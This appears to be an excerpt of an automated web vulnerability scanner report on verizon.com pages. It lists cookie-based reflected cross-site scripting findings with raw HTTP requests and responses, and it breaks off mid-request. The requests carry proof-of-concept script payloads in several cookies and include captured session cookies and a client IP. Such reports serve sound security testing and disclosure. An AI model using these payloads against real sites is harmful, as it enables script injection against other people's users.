Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:24:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:24:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:24:49 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

<script type="text/javasc
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX74CB5'><SCRIPT>ALERT(1)</SCRIPT>82C3E64957B ' />
...[SNIP]...

2.940. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1369'><script>alert(1)</script>447865505e6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXb1369'><script>alert(1)</script>447865505e6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70909
Expires: Sat, 20 Nov 2010 03:26:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:26:05 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:05 GMT; path=/
Set-Cookie: ContextInfo_State=TXb1369'><script>alert(1)</script>447865505e6; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:05 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:05 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:05 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB1369'><SCRIPT>ALERT(1)</SCRIPT>447865505E6 ' />
...[SNIP]...

2.941. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 742e0"-alert(1)-"b21238198de was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=742e0"-alert(1)-"b21238198de; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76442
Expires: Sat, 20 Nov 2010 03:25:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:25:56 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:25:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:25:56 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:25:56 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:25:56 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
OS Digital TV and High-Speed Internet Features','');
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "742e0"-alert(1)-"b21238198de"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.942. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b381b'><script>alert(1)</script>ce796c23fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb381b'><script>alert(1)</script>ce796c23fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70907
Expires: Sat, 20 Nov 2010 00:11:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=TXb381b'><script>alert(1)</script>ce796c23fc; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB381B'><SCRIPT>ALERT(1)</SCRIPT>CE796C23FC ' />
...[SNIP]...

2.943. http://www22.verizon.com/Residential/aboutFiOS/labs/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c885f'><script>alert(1)</script>e38458fc242 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc885f'><script>alert(1)</script>e38458fc242; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78149
Expires: Sat, 20 Nov 2010 03:27:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:27:24 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:24 GMT; path=/
Set-Cookie: ContextInfo_State=TXc885f'><script>alert(1)</script>e38458fc242; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:24 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:24 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:24 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC885F'><SCRIPT>ALERT(1)</SCRIPT>E38458FC242 ' />
...[SNIP]...

2.944. http://www22.verizon.com/Residential/aboutFiOS/labs/ [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f5c"-alert(1)-"f31c76e7900 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/labs/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=c5f5c"-alert(1)-"f31c76e7900; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; 